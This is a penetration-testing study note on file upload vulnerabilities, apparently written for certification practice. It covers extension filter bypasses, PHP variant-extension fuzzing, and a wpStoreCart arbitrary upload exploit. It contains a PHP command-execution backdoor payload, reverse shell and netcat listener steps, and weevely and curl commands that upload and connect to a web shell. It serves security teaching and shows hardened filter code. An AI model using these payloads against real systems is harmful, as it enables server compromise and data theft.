
# 7.1 File Upload Vulnerability

## File Upload Vulnerability

File Upload Vulnerability, also known as Arbitrary File Upload, is a class of web application flaw that allows an attacker to upload a file of their choosing to the web server and, in the worst case, have the server execute it.

The attacker identifies the file upload functionality in the target app and attempts to upload a malicious file (scripts, a web shell, malware).

The vulnerability arises when the app fails to validate and secure uploaded files, for example by not restricting the permitted file extensions, the content type or the location where the file is stored.

The impact can be severe: unauthorized access to sensitive data, server compromise and complete control of the system.

### Discover file upload functionality

To start we need to find file upload functionality in the web app; directory brute-forcing tools such as DirBuster, gobuster or wfuzz help locate upload pages.

{% content-ref url="/spaces/iS3hadq7jVFgSa8k5wRA/pages/9Qv5XGp3s79duUXXFzlN" %}
[Gobuster](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/gobuster)
{% endcontent-ref %}

### Bypassing File Upload extension filters

If there's a file upload function, we can try to upload a file and capture the request with Burp Suite to understand exactly how the upload works.

Of course, if we can directly upload a 'malicious' file that gets us access (e.g. a PHP file) we have already won, but a web app with even a minimum of security design has an extension filter that blocks undesired file extensions.

<figure><img src="/files/DVD0hvlKKUSBOpZulURh" alt=""><figcaption></figcaption></figure>

In this case we can only upload JPG, PNG and BMP files; we then try to upload a .php file anyway and capture the request with Burp Suite.

As expected, the upload is rejected again, but in Burp Suite we can edit the intercepted request: change `filename="shell.php"` to `filename="shell.jpg"`, leave the part's `Content-Type` (still the PHP one) and the PHP body untouched, and forward the request.

<figure><img src="/files/gPFBsYqwNlgLv9cMzAXm" alt=""><figcaption></figcaption></figure>

With this trick a poorly designed web app accepts the file, because its filter looks only at the extension of the client-supplied filename.

To execute the uploaded file, request the stored name with its .jpg extension and append a path component ending in .php (shell.jpg/shell.php). This works on servers whose PHP handler resolves path info (typically nginx with php-fpm and `cgi.fix_pathinfo` enabled): the request is handed to PHP, which executes the .jpg file as a script.

<figure><img src="/files/fgEX7qQFzvX4cCQ8pHf3" alt=""><figcaption></figcaption></figure>
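The bypass described above, modelled end to end as an added example (this is not code from the eWPT notes or from any lab application): `build_multipart()` produces the body Burp shows for the upload POST with the filename renamed to `shell.jpg` while the part's `Content-Type` and the PHP body are left as they were; `weak_filter()` is the "bad web app" that only checks the extension of the client-supplied name; `hardened_filter()` is the check that stops the trick. The form field name, the boundary, the `application/x-php` content type, the PHP payload and the whitelist are constructed for illustration.

```python
"""Added example (not from the eWPT notes): upload filter bypass, client and server side."""
import os
import re

ALLOWED_EXT = {"jpg", "png", "bmp"}                  # whitelist from the page
MIME = {"jpg": "image/jpeg", "png": "image/png", "bmp": "image/bmp"}
MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "bmp": b"BM"}

# Constructed payload: a minimal simple-backdoor style script, as it appears on the wire.
PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>"


def build_multipart(field, filename, content_type, data, boundary="----BurpBoundary"):
    """Return (headers, body) for a single-file multipart/form-data upload."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    body = head + data + f"\r\n--{boundary}--\r\n".encode()
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def parse_part(body):
    """Server side: recover (filename, content_type, data) from the body above."""
    head, rest = body.split(b"\r\n\r\n", 1)
    data = rest.rsplit(b"\r\n--", 1)[0]
    filename = re.search(rb'filename="([^"]*)"', head).group(1).decode()
    content_type = re.search(rb"Content-Type: ([^\r\n]+)", head).group(1).decode()
    return filename, content_type, data


def weak_filter(filename, content_type, data):
    """Vulnerable check: trusts whatever extension the client put in the filename."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT


def hardened_filter(filename, content_type, data):
    """Extension, declared MIME type and file signature must all agree.

    A single dot rules out shell.php.jpg / shell.jpg.php; basename() drops any
    directory part.  The server should additionally store the file under a name
    it generates itself, so that path-info tricks (x.jpg/x.php) have no
    attacker-chosen name to aim at.
    """
    name = os.path.basename(filename)
    if name.count(".") != 1:
        return False
    ext = name.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_EXT or content_type != MIME[ext]:
        return False
    return data.startswith(MAGIC[ext])


def simulate(filter_fn, filename, content_type, data):
    """Forge the upload, parse it as the server would, return True if accepted."""
    _headers, body = build_multipart("file", filename, content_type, data)
    return filter_fn(*parse_part(body))


if __name__ == "__main__":
    # The request as edited in Burp: filename shell.php -> shell.jpg, body still PHP.
    print("weak,     shell.jpg with PHP body:", simulate(weak_filter, "shell.jpg", "application/x-php", PHP_PAYLOAD))
    print("hardened, shell.jpg with PHP body:", simulate(hardened_filter, "shell.jpg", "application/x-php", PHP_PAYLOAD))
    print("hardened, real JPEG             :", simulate(hardened_filter, "cat.jpg", "image/jpeg", b"\xff\xd8\xff\xe0JFIF"))
```

The weak filter accepts the renamed PHP file because nothing it looks at changed when only the filename did; the hardened filter rejects it on the MIME mismatch alone and would also reject it on the missing JPEG signature. Checking the magic bytes is still not enough on its own (a PHP payload can be appended to a valid image), which is why the rename to a server-chosen filename and a non-executing storage location matter as much as the validation.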

#### Bypassing PHPx blacklist

An upload form may accept a .php file but the server then serves it as a plain data file instead of executing it: opening it in the browser shows the PHP source.

Capturing the upload POST with Burp Suite, the response carries `X-Powered-By: PHP/5.5.9-1ubuntu4.25`, so PHP is present on the server and we know the version our payload has to run on.

In this case we can try a different PHP file: a variant extension that the blacklist misses but the PHP handler still executes (.php3, .php5, .phtml, .phar and similar, depending on the server configuration), with a payload generated on this website:

{% embed url="<https://www.revshells.com/>" %}

Remember that Kali Linux ships ready-to-use PHP webshells, usually under `/usr/share/webshells/php/`; uploading `simple-backdoor.php` gives remote command execution from the browser.

<figure><img src="/files/LfdNeEQmCv1AccnRXsA9" alt=""><figcaption></figcaption></figure>

or use a reverse shell with `php-reverse-shell.php`, editing the file to set the attacker IP and the port on which netcat is listening (`nc -lvnp <port>`).

{% hint style="info" %}
In addition, we can use Burp Suite Intruder to brute force file extensions and understand which extensions are allowed or not.
{% endhint %}
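The Intruder brute force from the hint above, together with the PHPx blacklist idea, as an added example (not code from the eWPT notes): `generate_candidates()` is the payload list you would feed to Intruder for the filename, `naive_blacklist()` stands in for a filter that only rejects a literal `.php` ending, and `fuzz()` returns the names such a filter lets through, which is what Intruder's status and length columns would tell you. Whether the server then actually executes a surviving extension depends on its handler configuration, so the output is a list worth uploading and requesting, not confirmed code execution. The variant list and the filter are constructed for illustration.

```python
"""Added example (not from the eWPT notes): Intruder-style extension fuzzing against a blacklist."""

# Extensions PHP handlers have historically been mapped to besides .php.
PHP_VARIANTS = ["php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht"]
IMAGE_EXT = ["jpg", "png", "bmp"]                 # the page's allowed types


def generate_candidates(base="shell"):
    """Filenames to try, grouped the way you would read them in Intruder."""
    names = []
    for ext in PHP_VARIANTS:
        # case variants: a blacklist that compares case-sensitively misses these
        for variant in (ext, ext.upper(), ext.capitalize()):
            name = f"{base}.{variant}"
            if name not in names:
                names.append(name)
        # double extensions: which one the server honours depends on its config
        for img in IMAGE_EXT:
            names.append(f"{base}.{ext}.{img}")
            names.append(f"{base}.{img}.{ext}")
    return names


def naive_blacklist(filename):
    """Vulnerable filter: rejects only names whose last extension is exactly 'php'."""
    return filename.rsplit(".", 1)[-1] != "php"


def fuzz(filter_fn, candidates=None):
    """Return the candidates the filter accepts (Intruder: the non-error responses)."""
    return [name for name in (candidates or generate_candidates()) if filter_fn(name)]


if __name__ == "__main__":
    accepted = fuzz(naive_blacklist)
    print(f"{len(accepted)} of {len(generate_candidates())} candidates pass the blacklist")
    for name in accepted:
        print("  ", name)
```

Against a real target the list goes into Intruder as the payload for the extension position, and the interesting rows are the ones whose response differs from the rejected `shell.php` baseline; each accepted name then has to be requested in the browser to see whether the server executes it or returns the source, as in the `X-Powered-By` case above.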

### WordPress wpStoreCart File Upload

When the target runs a CMS such as WordPress, we can enumerate it with wpscan: `wpscan --url <website>`

The scan result may reveal a plugin called wpstorecart.

wpStoreCart versions 2.5.27 to 2.5.29 contain an arbitrary file upload flaw: the plugin's upload feature does not properly validate or sanitize the files users upload.

{% embed url="<https://www.exploit-db.com/exploits/19023>" %}

Using this exploit we can upload an arbitrary malicious file (backdoor, reverse shell, etc.).

For the shell we can use netcat or another great tool, weevely, following these steps:

* Generate a new agent -> `weevely generate password ~/Desktop/login.php` (login.php is the filename the exploit script uploads)

<figure><img src="/files/mEfMAGkeW5nEDLE2c37u" alt=""><figcaption></figcaption></figure>

* Run the exploit -> `php -f exploit.php`
* The agent is now reachable on the target at /wp-content/uploads/wpstorecart/login.php (open it in the browser to confirm the upload worked)
* Connect to the agent -> `weevely <website url>/wp-content/uploads/wpstorecart/login.php password`
* We obtain a shell session in weevely

Alternatively, upload the agent directly with curl against the plugin's upload handler (the same endpoint the exploit script posts to): `curl -F "Filedata=@./login.php" <upload endpoint url>`; the file lands in /wp-content/uploads/wpstorecart/ and we connect with weevely as above.
